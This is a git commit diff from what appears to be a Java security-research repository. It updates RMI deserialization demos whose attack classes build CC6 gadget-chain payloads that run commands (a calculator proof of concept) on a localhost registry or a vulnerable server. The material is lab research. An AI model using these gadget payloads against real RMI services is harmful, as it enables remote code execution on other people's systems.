update rmi demo :)

Whoopsunix · Whoopsunix · commit 6bdd4803881d · 2024-05-16T09:42:09.000+08:00
diff --git a/JNDIAttack/pom.xml b/JNDIAttack/pom.xml
@@ -33,6 +33,7 @@
             <plugin>
                 <groupId>org.apache.maven.plugins</groupId>
                 <artifactId>maven-compiler-plugin</artifactId>
+                <version>3.8.1</version>
                 <configuration>
                     <source>8</source>
                     <target>8</target>
diff --git a/JNDIAttack/rmi.policy b/JNDIAttack/rmi.policy
@@ -0,0 +1,3 @@
+grant {
+    permission java.security.AllPermission;
+};
diff --git a/JNDIAttack/src/main/java/base/RMIClient.java b/JNDIAttack/src/main/java/base/RMIClient.java
@@ -14,8 +14,8 @@ public static void main(String[] args) throws Exception {
 //        System.out.println(remoteObject.sayHello());
 
 //        // M2 Registry
-        Registry registry = LocateRegistry.getRegistry("192.168.66.143", 1099);
+        Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099);
         RemoteInterface remoteObject2 = (RemoteInterface) registry.lookup("Hello");
-        System.out.println(remoteObject2.sayHello());
+        System.out.println(remoteObject2.sayHello(1));
     }
 }
diff --git a/JNDIAttack/src/main/java/base/RemoteInterface.java b/JNDIAttack/src/main/java/base/RemoteInterface.java
@@ -10,4 +10,6 @@ public interface RemoteInterface extends Remote {
     public Calc sayHello() throws RemoteException;
 
     public String sayHello(Object name) throws RemoteException;
+
+    public int sayHello(int num) throws RemoteException;
 }
diff --git a/JNDIAttack/src/main/java/base/RemoteObject.java b/JNDIAttack/src/main/java/base/RemoteObject.java
@@ -21,4 +21,9 @@ public String sayHello(Object name) throws RemoteException {
         return name.getClass().getName();
     }
 
+    @Override
+    public int sayHello(int num) throws RemoteException {
+        return 0;
+    }
+
 }
diff --git a/JNDIAttack/src/main/java/base/RemoteServer.java b/JNDIAttack/src/main/java/base/RemoteServer.java
@@ -12,6 +12,6 @@ public static void main(String[] args) throws Exception{
         LocateRegistry.createRegistry(1099);
         RemoteInterface remoteObject = new RemoteObject();
 //        Naming.bind("rmi://127.0.0.1/Hello", remoteObject);
-        Naming.bind("rmi://192.168.66.143/Hello", remoteObject);
+        Naming.bind("rmi://127.0.0.1/Hello", remoteObject);
     }
 }
diff --git a/JNDIAttack/src/main/java/client/AttackRemoteObject.java b/JNDIAttack/src/main/java/client/AttackRemoteObject.java
@@ -14,6 +14,6 @@ public AttackRemoteObject() throws RemoteException {
 
     @Override
     public Object sayHello() throws Exception {
-        return Serializer.cc6("calc");
+        return Serializer.cc6("open -a Calculator.app");
     }
 }
diff --git a/JNDIAttack/src/main/java/client/AttackRemoteServer.java b/JNDIAttack/src/main/java/client/AttackRemoteServer.java
@@ -15,7 +15,7 @@ public static void main(String[] args) throws Exception{
         AttackRemoteInterface remoteObject = new AttackRemoteObject();
 
         // 这个地址是客户端要访问的地址
-        Naming.bind("rmi://192.168.66.143/xxx", remoteObject);
+        Naming.bind("rmi://127.0.0.1/xxx", remoteObject);
         System.out.println("Server Start");
 
     }
diff --git a/JNDIAttack/src/main/java/client/VulRMIClient.java b/JNDIAttack/src/main/java/client/VulRMIClient.java
@@ -1,20 +1,24 @@
 package client;
 
 
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+
 /**
  * @author Whoopsunix
  *
  */
 public class VulRMIClient {
     public static void main(String[] args) throws Exception {
         // M1 Naming
-        String url = "rmi://192.168.66.143:1099/xxx";
-        AttackRemoteInterface remoteObject = (AttackRemoteInterface) java.rmi.Naming.lookup(url);
-        System.out.println(remoteObject.sayHello());
+//        String url = "rmi://127.0.0.1:1099/xxx";
+//
+//        java.rmi.Naming.lookup(url);
+//        java.rmi.Naming.list(url);
 
 //        // M2 Registry
-//        Registry registry = LocateRegistry.getRegistry("192.168.66.143", 1099);
-//        AttackRemoteInterface remoteObject2 = (AttackRemoteInterface) registry.lookup("xxx");
+        Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099);
+        AttackRemoteInterface remoteObject2 = (AttackRemoteInterface) registry.lookup("xxx");
 //        System.out.println(remoteObject2.sayHello());
 
     }
diff --git a/JNDIAttack/src/main/java/clientserver/AttackRegistry.java b/JNDIAttack/src/main/java/clientserver/AttackRegistry.java
@@ -30,8 +30,8 @@ public AttackRegistry(int port, Object payloadObject) throws NumberFormatExcepti
 
     public static final void main(String[] args) {
         try {
-//            Object annotationInvocationHandler = Serializer.cc6("open -a Calculator.app");
-            Object annotationInvocationHandler = Serializer.cc6("calc");
+            Object annotationInvocationHandler = Serializer.cc6("open -a Calculator.app");
+//            Object annotationInvocationHandler = Serializer.cc6("calc");
             int port = 1099;
 
             System.err.println("* Opening JRMP listener on " + port);
diff --git a/JNDIAttack/src/main/java/clientserver/Client.java b/JNDIAttack/src/main/java/clientserver/Client.java
@@ -9,9 +9,9 @@
  */
 public class Client {
     public static void main(String[] args) throws Exception {
-//        Registry registry = LocateRegistry.getRegistry("192.168.66.143", 1099);
+//        Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099);
 //        registry.list();
 
-        Naming.lookup("rmi://192.168.66.143:1099/xxx");
+        Naming.lookup("rmi://127.0.0.1:1099/xxx");
     }
 }
diff --git a/JNDIAttack/src/main/java/registry/Bind.java b/JNDIAttack/src/main/java/registry/Bind.java
@@ -24,7 +24,7 @@ public static void main(String[] args) throws Exception {
                 new Class[]{Remote.class}, (InvocationHandler) annotationInvocationHandler));
 
         // 远程
-        Registry registry_remote = LocateRegistry.getRegistry("192.168.66.143", 1099);
+        Registry registry_remote = LocateRegistry.getRegistry("127.0.0.1", 1099);
         registry_remote.bind("Hello", proxyEvalObject);
 
         // 自封装
diff --git a/JNDIAttack/src/main/java/registry/Lookup.java b/JNDIAttack/src/main/java/registry/Lookup.java
@@ -30,7 +30,7 @@ public static void main(String[] args) throws Exception {
                 new Class[]{Remote.class}, (InvocationHandler) annotationInvocationHandler));
 
         // 客户端逻辑
-        Registry registry_remote = LocateRegistry.getRegistry("192.168.66.143", 1099);
+        Registry registry_remote = LocateRegistry.getRegistry("127.0.0.1", 1099);
 
         // lookup 逻辑
         // 获取super.ref
diff --git a/JNDIAttack/src/main/java/server/AttackRMIClient.java b/JNDIAttack/src/main/java/server/AttackRMIClient.java
@@ -2,7 +2,9 @@
 
 import utils.Serializer;
 
-import java.lang.reflect.Method;
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+import java.util.Arrays;
 
 
 /**
@@ -15,19 +17,21 @@ public static void main(String[] args) throws Exception {
         /**
          * 参数攻击
          */
-//        Object annotationInvocationHandler = Serializer.cc6("open -a Calculator.app");
-//        VulRemoteInterface vulRemoteInterface = (VulRemoteInterface) java.rmi.Naming.lookup("rmi://192.168.66.143:1099/xxx");
-//        vulRemoteInterface.sayHello(annotationInvocationHandler);
+        Object annotationInvocationHandler = Serializer.cc6("open -a Calculator.app");
+        VulRemoteInterface vulRemoteInterface = (VulRemoteInterface) java.rmi.Naming.lookup("rmi://127.0.0.1:1099/xxx");
+        vulRemoteInterface.sayHello(annotationInvocationHandler);
 
         /**
          * 参数攻击2
          */
 //        Object annotationInvocationHandler = Serializer.cc6("open -a Calculator.app");
-//        VulRemoteInterface vulRemoteInterface = (VulRemoteInterface) java.rmi.Naming.lookup("rmi://192.168.66.143:1099/xxx");
+//        VulRemoteInterface vulRemoteInterface = (VulRemoteInterface) java.rmi.Naming.lookup("rmi://127.0.0.1:1099/xxx");
 //        vulRemoteInterface.sayUser(annotationInvocationHandler);
 //        // 反射
 //        Method method = vulRemoteInterface.getClass().getMethod("sayUser", Object.class);
 //        method.invoke(vulRemoteInterface, annotationInvocationHandler);
 
+
+
     }
 }
diff --git a/JNDIAttack/src/main/java/server/VulRemoteServer.java b/JNDIAttack/src/main/java/server/VulRemoteServer.java
@@ -15,7 +15,7 @@ public static void main(String[] args) throws Exception{
         VulRemoteInterface remoteObject = new VulRemoteObject();
 
         // 这个地址是客户端要访问的地址
-        Naming.rebind("rmi://192.168.66.143/xxx", remoteObject);
+        Naming.rebind("rmi://0.0.0.0/xxx", remoteObject);
         System.out.println("Server Start");
 
     }
diff --git a/README.md b/README.md
@@ -10,7 +10,7 @@ By. Whoopsunix
 
 🚧 长期项目 不定期学习后更新......
 
-[//]: # (🛰️ 部分利用已经集成在二开 [ysoserial]&#40;https://github.com/Whoopsunix/ysoserial&#41; 项目中)
+🛰️ 部分利用已经集成在 [PPPYSO](https://github.com/Whoopsunix/PPPYSO) 项目中
 
 🪝 [PPPRASP](https://github.com/Whoopsunix/PPPRASP) 项目中对本项目给出的漏洞实现防护（仅实现关键函数的 HOOK，不作进一步处理）
 
@@ -44,7 +44,7 @@ By. Whoopsunix
 - [0x07 文件读写 Demo](#0x07-文件读写-demo)
 - [0x08 XXE 有回显测试 Demo](#0x08-xxe-有回显测试-demo)
 - [0x09 SSTI](#0x09-ssti)
-- [鸣谢](#Thanks)
+- [0x10 RMI](#0x10-rmi)
 
 # 0x01 [RceEcho & MemShell](MemShellAndRceEcho)
 
@@ -180,6 +180,8 @@ WildFly 默认容器用的 Undertow
 - 探测用Payload
   - DNSLOG、HTTPLOG
   - 延时
+- 字节码加载
+  - JDK 高版本加载
 
 ## [JxPath](Expression/JxPathAttack)
 
@@ -274,12 +276,12 @@ JDBC 序列化的知识可以参考这些项目 [JDBC-Attack](https://github.com
 - freeMarker
 - thymeleaf
 
+# 0x10 [RMI](JNDIAttack)
+
+RMI 分析配置代码
+
 # Stats
 
 ![Alt](https://repobeats.axiom.co/api/embed/818a4d2c0d1562eec751b2637b825b3b0d2cf0e3.svg "Repobeats analytics image")
 
 [//]: # ([![Stargazers over time]&#40;https://starchart.cc/Whoopsunix/JavaRce.svg&#41;]&#40;https://starchart.cc/Whoopsunix/JavaRce&#41;)
-
-# Thanks
-
-感谢师傅们的研究 带来了很大的帮助 :)

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,3 @@`
	`1`	`+grant {`
	`2`	`+ permission java.security.AllPermission;`
	`3`	`+};`
Original file line number	Diff line number	Diff line change
`@@ -14,8 +14,8 @@ public static void main(String[] args) throws Exception {`
`14`	`14`	`// System.out.println(remoteObject.sayHello());`
`15`	`15`
`16`	`16`	`// // M2 Registry`
`17`		`- Registry registry = LocateRegistry.getRegistry("192.168.66.143", 1099);`
	`17`	`+ Registry registry = LocateRegistry.getRegistry("127.0.0.1", 1099);`
`18`	`18`	`RemoteInterface remoteObject2 = (RemoteInterface) registry.lookup("Hello");`
`19`		`- System.out.println(remoteObject2.sayHello());`
	`19`	`+ System.out.println(remoteObject2.sayHello(1));`
`20`	`20`	`}`
`21`	`21`	`}`
Original file line number	Diff line number	Diff line change
`@@ -10,4 +10,6 @@ public interface RemoteInterface extends Remote {`
`10`	`10`	`public Calc sayHello() throws RemoteException;`
`11`	`11`
`12`	`12`	`public String sayHello(Object name) throws RemoteException;`
	`13`	`+`
	`14`	`+ public int sayHello(int num) throws RemoteException;`
`13`	`15`	`}`
Original file line number	Diff line number	Diff line change
`@@ -21,4 +21,9 @@ public String sayHello(Object name) throws RemoteException {`
`21`	`21`	`return name.getClass().getName();`
`22`	`22`	`}`
`23`	`23`
	`24`	`+ @Override`
	`25`	`+ public int sayHello(int num) throws RemoteException {`
	`26`	`+ return 0;`
	`27`	`+ }`
	`28`	`+`
`24`	`29`	`}`
Original file line number	Diff line number	Diff line change
`@@ -12,6 +12,6 @@ public static void main(String[] args) throws Exception{`
`12`	`12`	`LocateRegistry.createRegistry(1099);`
`13`	`13`	`RemoteInterface remoteObject = new RemoteObject();`
`14`	`14`	`// Naming.bind("rmi://127.0.0.1/Hello", remoteObject);`
`15`		`- Naming.bind("rmi://192.168.66.143/Hello", remoteObject);`
	`15`	`+ Naming.bind("rmi://127.0.0.1/Hello", remoteObject);`
`16`	`16`	`}`
`17`	`17`	`}`
Original file line number	Diff line number	Diff line change
`@@ -14,6 +14,6 @@ public AttackRemoteObject() throws RemoteException {`
`14`	`14`
`15`	`15`	`@Override`
`16`	`16`	`public Object sayHello() throws Exception {`
`17`		`- return Serializer.cc6("calc");`
	`17`	`+ return Serializer.cc6("open -a Calculator.app");`
`18`	`18`	`}`
`19`	`19`	`}`
Original file line number	Diff line number	Diff line change
`@@ -15,7 +15,7 @@ public static void main(String[] args) throws Exception{`
`15`	`15`	`AttackRemoteInterface remoteObject = new AttackRemoteObject();`
`16`	`16`
`17`	`17`	`// 这个地址是客户端要访问的地址`
`18`		`- Naming.bind("rmi://192.168.66.143/xxx", remoteObject);`
	`18`	`+ Naming.bind("rmi://127.0.0.1/xxx", remoteObject);`
`19`	`19`	`System.out.println("Server Start");`
`20`	`20`
`21`	`21`	`}`